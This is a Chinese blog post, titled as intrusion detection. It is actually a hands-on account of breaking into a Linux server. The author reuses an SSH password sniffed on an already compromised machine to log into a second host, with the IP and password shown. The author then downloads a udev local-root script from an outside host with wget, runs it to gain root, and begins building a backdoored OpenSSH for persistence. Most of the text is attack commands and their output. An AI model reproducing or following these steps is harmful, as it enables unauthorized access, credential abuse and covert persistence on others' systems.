一台linux肉鸡的简单手工入侵检测过程

今天发现一台肉鸡上某人的ssh连到另外一台服务器上，记录下了密码。

[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11

直接ssh上去。

[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel on an m

[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux

是rhel5.0没升级过内核，vmsplice的local root应该可以的，不过测试了下，机器挂了，换udev的好了。

[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
13:21:09 http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80… .. 200 OK
366 (3.3K) [application/x-sh]
Saving to: `u.sh’
100%[===========================================================================================>] 3,366       --.-K/s   in 0.04s 

13:21:09 (93.7 KB/s) - `u.sh saved [3366/3366]

[ldc@localhost .v]$ ls
r00t    r00t.c  u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
f69f8800 0   2486   00000111 0        0        00000000 2
f7fdae00 0   0      00000000 0        0        00000000 2
c2132200 6   0      00000000 0        0        00000000 2
f6a57a00 7   2143   00000001 0        0        00000000 2
f7caf000 7   0      00000000 0        0        00000000 2
f6a0be00 9   2143   00000000 0        0        00000000 2
f6a61200 9   1996   00000000 0        0        00000000 2
f7de1c00 9   0      00000000 0        0        00000000 2
f7d6ca00 10  0      00000000 0        0        00000000 2
f7fb3200 11  0      00000000 0        0        00000000 2
c2154200 15  476    ffffffff 0        0        00000000 2
f7fdac00 15  0      00000000 0        0        00000000 2
f7fb3000 16  0      00000000 0        0        00000000 2
c21cde00 18  0      00000000 0        0        00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root       477 0.0 0.0 2916 1396 ?        S<   12:36   0:00 /sbin/udevd -d
ldc       3462 0.0 0.0 4128 680 pts/0    S    13:00   0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c:
suid.c:3:

sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

已经是root权限了。

sh-3.1# w
13:25:18 up 48 min,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
ldc      pts/0    100.204.107.20    13:05    0.00s  0.12s  0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006

我们先留个ssh的后门。

[===========================================================================================>] 979,990     1.14M/s   in 0.8s  

13:32:08 (1.14 MB/s) - `openssh4.3p2.tar.gz saved [979990/979990]

sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure --prefix=/usr --sysconfdir=/etc/ssh
checking for gcc... gcc
checking for C compiler default output file name... a.out
............（省略若干行）

sh-3.1# make && make install
conffile=`echo sshd_config.out | sed s/.out$//`;
        /bin/sed -e s|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g -e
............（省略若干行）

[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh

[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name  
tcp        0      0 127.0.0.1:2208              0.0.0.0:*                   LISTEN      2298/hpiod      &